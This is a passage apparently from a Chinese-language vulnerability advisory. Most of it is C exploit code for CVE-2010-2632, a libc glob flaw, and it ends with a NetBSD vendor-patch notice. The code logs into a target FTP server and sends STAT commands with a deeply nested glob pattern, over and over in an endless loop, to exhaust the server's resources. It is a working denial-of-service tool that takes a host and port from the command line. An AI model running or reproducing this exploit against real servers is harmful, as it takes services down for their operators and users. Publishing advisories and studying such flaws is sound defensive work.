readftp(sockfd,1024);
snprintf(buffer,1024,"USER %s\nPASS %s\n\n",login,pass);
sendftp(sockfd,buffer);
readftp(sockfd,1024);
bzero(buffer,1024);
snprintf(buffer,1024,"stat %s\n",pattern);
sendftp(sockfd,buffer);
freeaddrinfo(res0);
}
int main(int argc,char *argv[])
{
char
pattern[1024]="{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx"; // some servers support only 1024
char *login,*pass;
char logindef[]="anonymous",passdef[]="cve_2010_2632@127.0.0.1";
printf("This is exploit for CVE-2010-2632 (libc/glob)\nby Maksymilian Arciemowicz\n\n");
if(argc<3){
printf("Use: ./exploit host port [username] [password]\nhost and port are requied\n");
exit(1);
}
char *host=argv[1];
char *port=argv[2];
if(4<=argc) login=argv[3];
else login=logindef;
if(5<=argc) pass=argv[4];
else pass=passdef;
while(1){
printf("----------------------------- next\n");
sendstat(host,port,login,pass,pattern);
sleep(3); // some delay to be sure
}
return 0; // never happen
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
NetBSD
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: